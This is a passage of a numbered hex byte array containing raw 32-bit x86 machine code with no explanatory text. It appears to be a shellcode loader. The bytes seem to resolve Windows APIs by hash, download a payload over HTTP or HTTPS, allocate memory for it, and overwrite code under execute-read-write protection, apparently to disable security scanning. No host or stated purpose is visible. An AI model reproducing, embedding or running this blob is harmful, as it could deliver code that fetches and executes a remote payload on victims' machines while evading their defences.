21 0xbe, 0x34, 0x02, 0x00, 0x00, 0x76, 0x16, 0x8d, 0x9e, 0x38, 0x02, 0x00,
22 0x00, 0x53, 0xff, 0x56, 0x30, 0x47, 0x83, 0xc3, 0x20, 0x3b, 0xbe, 0x34,
23 0x02, 0x00, 0x00, 0x72, 0xf0, 0x33, 0xdb, 0x43, 0x39, 0x5d, 0x00, 0x76,
24 0x34, 0x8d, 0x6e, 0x34, 0x8d, 0x7e, 0x38, 0xff, 0x76, 0x2c, 0xff, 0x76,
25 0x28, 0xff, 0x77, 0x04, 0xff, 0x37, 0x56, 0xe8, 0xce, 0x19, 0x00, 0x00,
26 0x83, 0xc4, 0x14, 0x89, 0x45, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xd2, 0x00,
27 0x00, 0x00, 0x43, 0x83, 0xc7, 0x08, 0x83, 0xc5, 0x04, 0x3b, 0x9e, 0x30,
28 0x02, 0x00, 0x00, 0x72, 0xd2, 0x8b, 0x86, 0x0c, 0x05, 0x00, 0x00, 0x6a,
29 0x02, 0x5b, 0x3b, 0xc3, 0x75, 0x15, 0x56, 0xe8, 0x29, 0x05, 0x00, 0x00,
30 0x59, 0x85, 0xc0, 0x0f, 0x84, 0xa7, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x0c,
31 0x05, 0x00, 0x00, 0x8d, 0xbe, 0x48, 0x07, 0x00, 0x00, 0x83, 0xf8, 0x01,
32 0x74, 0x02, 0x8b, 0x3f, 0x83, 0xbe, 0x40, 0x03, 0x00, 0x00, 0x01, 0x74,
33 0x26, 0x56, 0xe8, 0x32, 0x03, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08,
34 0x39, 0x9e, 0x40, 0x03, 0x00, 0x00, 0x74, 0x78, 0x56, 0xe8, 0x05, 0x04,
35 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08, 0x39, 0x9e, 0x40, 0x03, 0x00,
36 0x00, 0x74, 0x65, 0x83, 0x3f, 0x03, 0x74, 0x59, 0x83, 0x3f, 0x04, 0x74,
37 0x54, 0x83, 0x3f, 0x01, 0x74, 0x23, 0x39, 0x1f, 0x74, 0x1f, 0x83, 0x3f,
38 0x05, 0x74, 0x12, 0x83, 0x3f, 0x06, 0x74, 0x0d, 0x83, 0x3f, 0x07, 0x75,
39 0x43, 0x56, 0xe8, 0xe5, 0x17, 0x00, 0x00, 0xeb, 0x3a, 0x56, 0xe8, 0x4c,
40 0x16, 0x00, 0x00, 0xeb, 0x32, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8,
41 0xe7, 0x0c, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x44,
42 0x24, 0x10, 0x50, 0x56, 0xe8, 0xe1, 0x0e, 0x00, 0x00, 0x59, 0x59, 0x8d,
43 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8, 0x5d, 0x08, 0x00, 0x00, 0x59, 0xeb,
44 0x06, 0x56, 0xe8, 0x91, 0x11, 0x00, 0x00, 0x59, 0x8b, 0x5c, 0x24, 0x34,
45 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x02, 0xbf, 0x00, 0xc0, 0x00, 0x00,
46 0x75, 0x2e, 0x8b, 0x86, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x24,
47 0xff, 0xb6, 0x40, 0x07, 0x00, 0x00, 0x6a, 0x00, 0x50, 0xe8, 0x7b, 0x1b,
48 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x57, 0x6a, 0x00, 0xff, 0xb6, 0x48, 0x07,
49 0x00, 0x00, 0xff, 0x56, 0x40, 0x83, 0xa6, 0x48, 0x07, 0x00, 0x00, 0x00,
50 0xff, 0x36, 0x6a, 0x00, 0x56, 0xe8, 0x5b, 0x1b, 0x00, 0x00, 0x83, 0xc4,
51 0x0c, 0x57, 0x6a, 0x00, 0x56, 0xff, 0xd3, 0x33, 0xc0, 0xeb, 0x03, 0x83,
52 0xc8, 0xff, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x20, 0xc3, 0x8b, 0x44,
53 0x24, 0x04, 0x83, 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04,
54 0x00, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xf6, 0x45, 0x10,
55 0x02, 0x56, 0x8b, 0x75, 0x08, 0x57, 0x74, 0x15, 0x8b, 0x7d, 0x18, 0x85,
56 0xff, 0x74, 0x1b, 0x8b, 0x46, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04,
57 0x8b, 0x46, 0x14, 0x89, 0x07, 0xf6, 0x45, 0x10, 0x01, 0x74, 0x19, 0x8b,
58 0x7d, 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb,
59 0x0d, 0x83, 0xc6, 0x0c, 0x56, 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37,
60 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04,
61 0x8b, 0x40, 0x28, 0xff, 0x50, 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01,
62 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0x08, 0x18, 0x00, 0x00,
63 0x8b, 0x74, 0x24, 0x10, 0xb9, 0x13, 0x14, 0x40, 0x00, 0xbf, 0xe4, 0x2a,
64 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0xed,
65 0x17, 0x00, 0x00, 0xb9, 0x62, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
66 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0xda, 0x17, 0x00, 0x00, 0xb9, 0x72,
67 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08,
68 0xe8, 0xc7, 0x17, 0x00, 0x00, 0xb9, 0xc0, 0x12, 0x40, 0x00, 0x2b, 0xcf,
69 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xb4, 0x17, 0x00, 0x00,
70 0xb9, 0x76, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
71 0x48, 0x10, 0xe8, 0xa1, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12, 0x40, 0x00,
72 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8, 0x8e, 0x17,
73 0x00, 0x00, 0xb9, 0x0e, 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
74 0x06, 0x89, 0x48, 0x18, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12,
75 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8,
76 0x68, 0x17, 0x00, 0x00, 0xb9, 0xc3, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03,
77 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x55, 0x17, 0x00, 0x00, 0xb9,
78 0xbe, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
79 0x24, 0xe8, 0x42, 0x17, 0x00, 0x00, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0x2b,
80 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x5f, 0x89, 0x48, 0x28, 0x8b, 0x44, 0x24,
81 0x08, 0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x28, 0x5e, 0xc3, 0x33, 0xc0,
82 0xc2, 0x04, 0x00, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56,
83 0x6a, 0x20, 0x50, 0x89, 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc,
84 0x8d, 0x45, 0xd4, 0x50, 0xe8, 0xc4, 0x19, 0x00, 0x00, 0x8b, 0x75, 0x0c,
85 0x8d, 0x4d, 0xd4, 0x83, 0xc4, 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50,
86 0x0c, 0x85, 0xc0, 0x75, 0x12, 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d,
87 0x4d, 0xf8, 0x51, 0x8d, 0x4d, 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33,
88 0xc0, 0x5e, 0xc9, 0xc2, 0x08, 0x00, 0x33, 0xc0, 0xc2, 0x0c, 0x00, 0x8b,
89 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80,
90 0xeb, 0x4d, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33, 0xd2, 0x56, 0x8b, 0x74,
91 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x28, 0x8b, 0x84, 0x97, 0xfc, 0x03, 0x00,
92 0x00, 0x3b, 0x04, 0x93, 0x75, 0x08, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee,
93 0xeb, 0x14, 0x33, 0xd2, 0x8b, 0x84, 0x97, 0xac, 0x04, 0x00, 0x00, 0x3b,
94 0x04, 0x93, 0x75, 0x10, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee, 0x89, 0x31,
95 0xf0, 0xff, 0x46, 0x04, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x21, 0x00, 0xb8,
96 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x4c,
97 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x04, 0x48, 0xc2,
98 0x04, 0x00, 0x8b, 0x44, 0x24, 0x18, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2,
99 0x18, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x0f, 0xaf, 0x44, 0x24, 0x08, 0xc3,
100 0x8b, 0x44, 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x14, 0x00,
101 0x8b, 0x44, 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51, 0x53, 0x56,
102 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x38, 0x03, 0x00, 0x00, 0x50, 0xff,
103 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00,
104 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0xac, 0x03, 0x00, 0x00, 0x50, 0x53,
105 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00,
106 0x00, 0xbf, 0x8e, 0x14, 0x40, 0x00, 0x81, 0xef, 0x82, 0x14, 0x40, 0x00,
107 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
108 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00,
109 0x00, 0x00, 0x57, 0xe8, 0xd8, 0x15, 0x00, 0x00, 0xb9, 0x82, 0x14, 0x40,
110 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8,
111 0x61, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
112 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0xbc,
113 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed,
114 0x74, 0x49, 0xbf, 0xa4, 0x14, 0x40, 0x00, 0xbb, 0x98, 0x14, 0x40, 0x00,
115 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57,
116 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x7e, 0x15,
117 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55,
118 0xe8, 0x0c, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10,
119 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0,
120 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x51,
121 0x53, 0x56, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x4c, 0x03, 0x00, 0x00,
122 0x50, 0xff, 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9,
123 0xc5, 0x00, 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0x5c, 0x03, 0x00, 0x00,
124 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa,
125 0x00, 0x00, 0x00, 0xbf, 0xda, 0x2a, 0x40, 0x00, 0x81, 0xef, 0x0e, 0x14,
126 0x40, 0x00, 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18,
127 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84,
128 0x85, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xf2, 0x14, 0x00, 0x00, 0xb9, 0x0e,
129 0x14, 0x40, 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50,
130 0x55, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24,
131 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d,
132 0x86, 0x7c, 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8,
133 0x85, 0xed, 0x74, 0x49, 0xbf, 0xd1, 0x2a, 0x40, 0x00, 0xbb, 0xc2, 0x2a,
134 0x40, 0x00, 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
135 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8,
136 0x98, 0x14, 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3,
137 0x50, 0x55, 0xe8, 0x26, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44,
138 0x24, 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48,
139 0x33, 0xc0, 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59,
140 0xc3, 0x81, 0xec, 0x58, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0x6a, 0x3c,
141 0x5f, 0x33, 0xf6, 0x8d, 0x44, 0x24, 0x28, 0x57, 0x56, 0x50, 0x89, 0x74,
142 0x24, 0x20, 0xbb, 0x00, 0x02, 0x60, 0x84, 0xe8, 0x09, 0x17, 0x00, 0x00,
143 0x8d, 0x44, 0x24, 0x70, 0x89, 0x7c, 0x24, 0x34, 0x8b, 0xbc, 0x24, 0x74,
144 0x02, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x89, 0x44, 0x24, 0x38, 0x8d, 0x84,
145 0x24, 0x64, 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x54, 0xb8, 0x00, 0x01,
146 0x00, 0x00, 0x89, 0x44, 0x24, 0x3c, 0x89, 0x44, 0x24, 0x58, 0x8d, 0x44,
147 0x24, 0x28, 0x50, 0x68, 0x00, 0x00, 0x00, 0x10, 0x56, 0x8d, 0x87, 0x10,
148 0x05, 0x00, 0x00, 0x50, 0xff, 0x57, 0x7c, 0x85, 0xc0, 0x0f, 0x84, 0xb4,
149 0x01, 0x00, 0x00, 0x33, 0xc0, 0x83, 0x7c, 0x24, 0x34, 0x04, 0x56, 0x56,
150 0x0f, 0x94, 0xc0, 0x56, 0x89, 0x44, 0x24, 0x1c, 0xb8, 0x00, 0x32, 0xe0,
151 0x84, 0x56, 0x56, 0x0f, 0x44, 0xd8, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00,
152 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x24, 0x85, 0xc9, 0x0f, 0x84, 0x85, 0x01,
153 0x00, 0x00, 0x39, 0x74, 0x24, 0x10, 0xba, 0xbb, 0x01, 0x00, 0x00, 0x56,
154 0x56, 0x6a, 0x03, 0x56, 0x56, 0x6a, 0x50, 0x58, 0x0f, 0x45, 0xc2, 0x0f,
155 0xb7, 0xc0, 0x50, 0x8d, 0x44, 0x24, 0x7c, 0x50, 0x51, 0xff, 0x97, 0x84,
156 0x00, 0x00, 0x00, 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x20, 0x85, 0xc9, 0x0f,
157 0x84, 0xfb, 0x00, 0x00, 0x00, 0x55, 0x56, 0x53, 0x56, 0x56, 0x56, 0x8d,
158 0x84, 0x24, 0x7c, 0x01, 0x00, 0x00, 0x50, 0x8d, 0x87, 0x10, 0x06, 0x00,
159 0x00, 0x50, 0x51, 0xff, 0x97, 0x94, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x85,
160 0xed, 0x0f, 0x84, 0xca, 0x00, 0x00, 0x00, 0x39, 0x74, 0x24, 0x14, 0x74,
161 0x20, 0xf7, 0xc3, 0x00, 0x10, 0x00, 0x00, 0x74, 0x18, 0x6a, 0x04, 0x8d,
162 0x44, 0x24, 0x20, 0xc7, 0x44, 0x24, 0x20, 0x80, 0x33, 0x00, 0x00, 0x50,
163 0x6a, 0x1f, 0x55, 0xff, 0x97, 0x88, 0x00, 0x00, 0x00, 0x56, 0x56, 0x56,
164 0x56, 0x55, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84,
165 0x8a, 0x00, 0x00, 0x00, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24,
166 0x14, 0x04, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x68,
167 0x13, 0x00, 0x00, 0x20, 0x55, 0xff, 0x97, 0x9c, 0x00, 0x00, 0x00, 0x85,
168 0xc0, 0x74, 0x67, 0x81, 0x7c, 0x24, 0x18, 0xc8, 0x00, 0x00, 0x00, 0x75,
169 0x5d, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00,
170 0x00, 0x00, 0x50, 0x8d, 0x9f, 0x40, 0x07, 0x00, 0x00, 0x53, 0x68, 0x05,
171 0x00, 0x00, 0x20, 0x55, 0x89, 0x33, 0x89, 0x73, 0x04, 0xff, 0x97, 0x9c,
172 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x03, 0x0b, 0x43, 0x04,
173 0x74, 0x2c, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x33, 0x56,
174 0xff, 0x57, 0x3c, 0x89, 0x87, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74,
175 0x15, 0x8d, 0x4c, 0x24, 0x20, 0x89, 0x74, 0x24, 0x20, 0x51, 0xff, 0x33,
176 0x50, 0x55, 0xff, 0x97, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0xf0, 0x55, 0xff,
177 0x97, 0x90, 0x00, 0x00, 0x00, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90,
178 0x00, 0x00, 0x00, 0x5d, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90, 0x00,
179 0x00, 0x00, 0x85, 0xf6, 0x74, 0x45, 0xff, 0xb7, 0x40, 0x07, 0x00, 0x00,
180 0x8b, 0x9f, 0x48, 0x07, 0x00, 0x00, 0x8d, 0x87, 0x30, 0x07, 0x00, 0x00,
181 0x53, 0x50, 0x8d, 0x87, 0x20, 0x07, 0x00, 0x00, 0x50, 0xe8, 0x0e, 0x14,
182 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8d, 0x87, 0x18, 0x06, 0x00, 0x00, 0xff,
183 0x77, 0x28, 0x50, 0xe8, 0xd7, 0x12, 0x00, 0x00, 0x83, 0xc4, 0x1c, 0x3b,
184 0x83, 0x08, 0x19, 0x00, 0x00, 0x75, 0x0c, 0x3b, 0x93, 0x0c, 0x19, 0x00,
185 0x00, 0x75, 0x04, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5e, 0x5b,
186 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec, 0xdc, 0x01, 0x00,
187 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00, 0x57,
188 0x8b, 0x6e, 0x3c, 0x8b, 0x44, 0x2e, 0x78, 0x85, 0xc0, 0x0f, 0x84, 0xe5,
189 0x00, 0x00, 0x00, 0x8d, 0x3c, 0x30, 0x8b, 0x5f, 0x18, 0x85, 0xdb, 0x0f,
190 0x84, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x1c, 0x33, 0xd2, 0x03, 0xc6,
191 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x24, 0x8b, 0x47, 0x20, 0x03,
192 0xc6, 0x89, 0x44, 0x24, 0x14, 0x8b, 0x47, 0x24, 0x03, 0xc6, 0x89, 0x44,
193 0x24, 0x20, 0x8b, 0x47, 0x0c, 0x03, 0xc6, 0x8a, 0x08, 0x84, 0xc9, 0x74,
194 0x2a, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x94, 0x24, 0xe8, 0x00, 0x00, 0x00,
195 0x2b, 0xd0, 0x80, 0xc9, 0x20, 0x46, 0x88, 0x0c, 0x02, 0x40, 0x8a, 0x08,
196 0x84, 0xc9, 0x75, 0xf2, 0x89, 0x74, 0x24, 0x10, 0x8b, 0xb4, 0x24, 0xf4,
197 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02,
198 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00, 0x00, 0x00, 0xc6, 0x84, 0x14,
199 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00,
200 0x50, 0xe8, 0x0d, 0x12, 0x00, 0x00, 0x89, 0x44, 0x24, 0x24, 0x83, 0xc4,
201 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0, 0xfc, 0x89, 0x54, 0x24, 0x1c,
202 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02,
203 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x03,
204 0xce, 0x51, 0xe8, 0xdc, 0x11, 0x00, 0x00, 0x33, 0x44, 0x24, 0x24, 0x83,
205 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b, 0x84, 0x24, 0xf8, 0x01, 0x00,
206 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc, 0x01, 0x00, 0x00, 0x74, 0x1d,
207 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04, 0x89, 0x44, 0x24, 0x10, 0x83,
208 0xeb, 0x01, 0x75, 0xbb, 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4,
209 0xdc, 0x01, 0x00, 0x00, 0xc3, 0x8b, 0x44, 0x24, 0x20, 0x8b, 0x4c, 0x24,
210 0x24, 0x0f, 0xb7, 0x44, 0x58, 0xfe, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0x3b,
211 0xcf, 0x72, 0x7d, 0x8b, 0x44, 0x2e, 0x7c, 0x03, 0xc7, 0x3b, 0xc8, 0x73,
212 0x73, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x1e, 0x8d, 0x7c, 0x24, 0x28, 0x8b,
213 0xf1, 0x2b, 0xf9, 0x83, 0xfa, 0x3c, 0x73, 0x11, 0x8a, 0x06, 0x88, 0x04,
214 0x37, 0x80, 0x3e, 0x2e, 0x74, 0x07, 0x42, 0x46, 0x80, 0x3e, 0x00, 0x75,
215 0xea, 0xc7, 0x44, 0x14, 0x29, 0x64, 0x6c, 0x6c, 0x00, 0x42, 0x03, 0xca,
216 0x33, 0xd2, 0x38, 0x11, 0x74, 0x17, 0x8d, 0x74, 0x24, 0x68, 0x2b, 0xf1,
217 0x83, 0xfa, 0x7f, 0x73, 0x0c, 0x8a, 0x01, 0x42, 0x88, 0x04, 0x0e, 0x41,
218 0x80, 0x39, 0x00, 0x75, 0xef, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00,
219 0x8d, 0x44, 0x24, 0x28, 0x50, 0xc6, 0x44, 0x14, 0x6c, 0x00, 0xff, 0x56,
220 0x30, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x4c, 0x24, 0x68, 0x51, 0x50, 0xff,
221 0x56, 0x34, 0x8b, 0xc8, 0xeb, 0x02, 0x33, 0xc9, 0x8b, 0xc1, 0xe9, 0x5b,
222 0xff, 0xff, 0xff, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x33, 0xff, 0x8b,
223 0x4e, 0x18, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
224 0x89, 0x7e, 0x18, 0x8b, 0x4e, 0x1c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01,
225 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x1c, 0x8b, 0x4e, 0x14, 0x85, 0xc9,
226 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x14, 0x8b,
227 0x4e, 0x10, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
228 0x89, 0x7e, 0x10, 0x8b, 0x4e, 0x0c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01,
229 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x0c, 0x8b, 0x4e, 0x08, 0x85, 0xc9,
230 0x74, 0x12, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x2c, 0x8b, 0x46, 0x08, 0x50,
231 0x8b, 0x08, 0xff, 0x51, 0x08, 0x89, 0x7e, 0x08, 0x8b, 0x4e, 0x04, 0x85,
232 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x04,
233 0x8b, 0x0e, 0x85, 0xc9, 0x74, 0x08, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
234 0x89, 0x3e, 0x5f, 0x5e, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x83, 0xc0, 0x10,
235 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04, 0x00, 0xb8, 0x01, 0x40, 0x00,
236 0x80, 0xc2, 0x0c, 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x10, 0x00,
237 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x8b, 0x44, 0x24, 0x04,
238 0xff, 0x74, 0x24, 0x18, 0xff, 0x74, 0x24, 0x14, 0x8b, 0x40, 0x08, 0xff,
239 0x74, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0xc2, 0x18, 0x00,
240 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x14, 0x00, 0x57, 0x8b, 0x7c, 0x24,
241 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x16,
242 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff,
243 0x51, 0x04, 0x8b, 0x46, 0x08, 0x89, 0x07, 0x33, 0xc0, 0x5e, 0x5f, 0xc2,
244 0x10, 0x00, 0x8b, 0x44, 0x24, 0x08, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x03,
245 0x40, 0x00, 0x80, 0xeb, 0x08, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33,
246 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xff, 0x75, 0x28, 0x8b, 0x45,
247 0x08, 0xff, 0x75, 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff, 0x75,
248 0x1c, 0xff, 0x75, 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51, 0xff,
